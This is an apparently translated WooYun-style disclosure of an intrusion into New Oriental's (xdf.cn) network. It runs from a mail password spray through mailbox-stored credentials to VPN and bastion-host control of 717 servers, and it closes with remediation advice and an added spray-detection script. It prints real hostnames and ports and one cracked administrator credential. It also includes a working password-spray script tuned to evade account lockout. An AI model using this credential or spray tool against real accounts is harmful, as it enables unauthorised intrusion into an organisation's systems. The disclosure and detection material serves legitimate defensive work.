Lax control of the New Oriental account system allows intranet roaming / "boss mode" (the company's 717 servers and their databases end up under your control)
What I have learned most from WooYun is human-assisted CAPTCHA bypass!
1. Entry point: https://mail.xdf.cn
Fuzzing the login with a pinyin-name username dictionary yields several accounts with weak passwords.
Mask Region: the list of accounts is redacted in the original; the surviving fragments are pinyin username prefixes (liny..., xiec..., zhou..., liji..., sunj...).
After logging in there is nothing sensitive in the webmail itself, until you find the mobile client.
From there you can view the whole organization address book.
For example, Yu
2. A crawler script harvests the mail accounts of all employees from the address book; then build a dictionary of keyboard-walk passwords and the passwords programmers commonly use.
For example:
Mask Region: the dictionary entries are redacted in the original; the surviving fragments (...WSX..., ...wsx..., ...sw2..., ...EDC..., ...edc..., ...X3...) are pieces of the 1qaz/2wsx/3edc keyboard column walk in lower and upper case.
............
Spraying that dictionary yields a large number of accounts:
Mask Region: the roughly one hundred cracked account/password pairs are redacted in the original. The visible fragments show that almost all of them are built from the company abbreviation (...xdf@..., ...xdf_1..., ...xdf_12...), a username followed by a keyboard walk (...n1qaz..., ...i1qaz..., ...ng1q...), or a username plus a digit run (...n123..., ...1234+...).
One of them is an IT department administrator:
zhangzhe11 !QAZ2wsx
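The two steps above (enumerate mailbox users, then spray a dictionary built from the company abbreviation and keyboard walks) as a worked script. This is an added example, not the reporter's crawler or fuzzer: the user list, the pattern set, the per-account attempt budget and the mock mail login are constructed here, and the real https://mail.xdf.cn login flow is not modelled. The one design point worth copying is the spray order: every account sees guess i before any account sees guess i+1, so a lockout threshold above the budget is never tripped.

```python
"""
Weak-password dictionary and password-spray driver.
Added illustration for the report's steps 1 and 2; not the reporter's script.
Assumptions: the user list, the pattern set and MockMail are constructed.
"""
from typing import Callable, Dict, Iterable, List

ORG = "xdf"  # company abbreviation that dominates the leaked passwords


def keyboard_walks() -> List[str]:
    """Adjacent-column walks on a US keyboard, with and without Shift
    (the family that 1qaz2wsx, !QAZ2wsx and 2wsx3edc belong to)."""
    cols = ["1qaz", "2wsx", "3edc", "4rfv", "5tgb", "6yhn"]
    shifted = ["!QAZ", "@WSX", "#EDC", "$RFV", "%TGB", "^YHN"]
    walks: List[str] = []
    for a, b, sa, sb in zip(cols, cols[1:], shifted, shifted[1:]):
        walks += [a + b, sa + b, a + sb, sa + sb]
    return walks


def candidates(user: str) -> List[str]:
    """Ordered guesses for one mailbox: name-based first (they hit most
    often in the report), then company-abbreviation patterns, then walks."""
    personal = [f"{user}123", f"{user}1234", f"{user}1qaz",
                f"{user}{ORG}_123", f"{user}@{ORG}"]
    company = [f"{ORG}@123", f"{ORG}_123", f"{ORG}_1234", f"{ORG}@1234"]
    out: List[str] = []
    for p in personal + company + keyboard_walks():
        if p not in out:  # keep order, drop duplicates
            out.append(p)
    return out


def spray(users: Iterable[str], attempt: Callable[[str, str], bool],
          budget: int) -> Dict[str, str]:
    """Password-major spray: round i tries the i-th guess for every user
    before anyone sees guess i+1, and no user receives more than `budget`
    attempts, so a lockout threshold above `budget` is never reached."""
    users = list(users)
    found: Dict[str, str] = {}
    for i in range(budget):
        for u in users:
            if u in found:
                continue
            guesses = candidates(u)
            if i < len(guesses) and attempt(u, guesses[i]):
                found[u] = guesses[i]
    return found


class MockMail:
    """Stand-in for the mail login (constructed credentials, not real data)."""

    def __init__(self, creds: Dict[str, str]):
        self.creds = creds
        self.attempts: Dict[str, int] = {}  # attempts seen per account

    def login(self, user: str, password: str) -> bool:
        self.attempts[user] = self.attempts.get(user, 0) + 1
        return self.creds.get(user) == password


if __name__ == "__main__":
    mock = MockMail({"liny": "liny123", "zhou": "xdf_123",
                     "ituser": "!QAZ2wsx", "sunj": "7Vq#dL9!mTe"})
    print(spray(mock.creds, mock.login, budget=12))
    print(mock.attempts)
```

With a budget of 12 the three weak accounts fall and the strong one is touched exactly 12 times; with a budget of 3 only the name-plus-digits account falls, which is the trade-off the lockout policy forces on an attacker.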
Searching this mailbox for password keywords returns all kinds of stored passwords, a startling amount.
Mask Region: the search results are redacted in the original. The legible fragments include internal addresses in 172.17.x.x and 10.x.x.x, root and admin credentials for Linux and Windows 2003 servers, a web server hostname, an FTP and an HTTP URL with logins, and notes on VPN and bastion-host accounts.
Trying one of them: the administrator was logged in at the time and I accidentally kicked his session off.
3. Finally, among the stored credentials were the VPN login and the super-administrator password of the bastion host.
VPN address
https://vpn.xdf.cn
VPN user manual: http://400.xdf.cn/knowledge/index.jhtm?ProviderNo=3001&articleId=229
Log in with the email account.
Bastion host: https://gate.staff.xdf.cn
Web mode: https://gate.staff.xdf.cn
Linux remote connection: gate.staff.xdf.cn, port 222
Windows Remote Desktop: gate.staff.xdf.cn, port 3390
Mask Region: the bastion host super-administrator credentials are redacted in the original.
717 hosts!
The bastion host manages all 717 of them, every server in the company, and records every session and command run through it.
Commands sent by administrators can also be added or deleted. The danger needs no further explanation.
Solution:
VLAN segmentation of the intranet. Segmentation alone does not stop the first step of this chain, weak-password guessing against the mail login, so a password policy, account lockout and a clean-up of credentials stored in mailboxes belong with it.
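The recommended VLAN fix does nothing against the entry point of this report, a password spray against the mail portal, so here is the detection a SOC would pair with it. This is an added example, not part of the report: the log line format, the sample lines and the thresholds are all constructed. The signature it keys on is the one the report's own numbers show: one source failing against many distinct accounts with one or two attempts each, as opposed to a single account failing many times (brute force, or a user mistyping their own password).

```python
"""
Password-spray detection over mail-login logs.
Added example; the log format, sample lines and thresholds are constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List

# Assumed log format: "<timestamp> login OK|FAIL user=<name> src=<ip>"
LINE = re.compile(
    r"^(?P<ts>\S+) login (?P<result>OK|FAIL) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def constructed_log() -> str:
    """Sample log for the example (constructed, not real data)."""
    lines: List[str] = []
    sprayed = ["liny", "xiec", "zhou", "liji", "sunj", "wangx", "chenl", "ituser"]
    for i, u in enumerate(sprayed):  # one guess per account from one source
        lines.append(f"2015-03-02T09:00:{i:02d} login FAIL user={u} src=203.0.113.7")
    # the weak-password account falls on the next round
    lines.append("2015-03-02T09:01:00 login OK user=zhou src=203.0.113.7")
    for i in range(4):  # a user mistyping their own password: one account, own IP
        lines.append(f"2015-03-02T09:02:{i:02d} login FAIL user=sunj src=198.51.100.4")
    lines.append("2015-03-02T09:02:10 login OK user=sunj src=198.51.100.4")
    for i in range(20):  # single-account brute force: many failures, one account
        lines.append(f"2015-03-02T09:03:{i:02d} login FAIL user=admin src=192.0.2.9")
    return "\n".join(lines)


def parse(log: str) -> List[Dict[str, str]]:
    """Parse log lines into event dicts; lines that do not fit are skipped."""
    events = []
    for line in log.splitlines():
        m = LINE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def detect_spray(events: List[Dict[str, str]], min_users: int = 5,
                 max_per_user: int = 3) -> Dict[str, Dict[str, int]]:
    """Flag sources that fail against at least `min_users` distinct accounts
    with at most `max_per_user` failures each: the shape of a spray.
    A single account with many failures is brute force, not a spray, and
    is left to a separate per-account rule."""
    per_src: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for e in events:
        if e["result"] == "FAIL":
            per_src[e["src"]][e["user"]] += 1
    alerts: Dict[str, Dict[str, int]] = {}
    for src, users in per_src.items():
        if len(users) >= min_users and max(users.values()) <= max_per_user:
            alerts[src] = {"accounts": len(users), "failures": sum(users.values())}
    return alerts


def compromised_after_spray(events: List[Dict[str, str]],
                            alerts: Dict[str, Dict[str, int]]) -> Dict[str, List[str]]:
    """Accounts that logged in successfully from a source flagged as spraying:
    these are the passwords that were guessed and need an immediate reset."""
    hits: Dict[str, List[str]] = defaultdict(list)
    for e in events:
        if e["result"] == "OK" and e["src"] in alerts:
            hits[e["src"]].append(e["user"])
    return dict(hits)


if __name__ == "__main__":
    evs = parse(constructed_log())
    found = detect_spray(evs)
    print(found)
    print(compromised_after_spray(evs, found))
```

On the sample, only the source that touched eight accounts once each is flagged, and the success that follows it names the account whose password was guessed; the mistyping user and the single-account brute force are left for other rules.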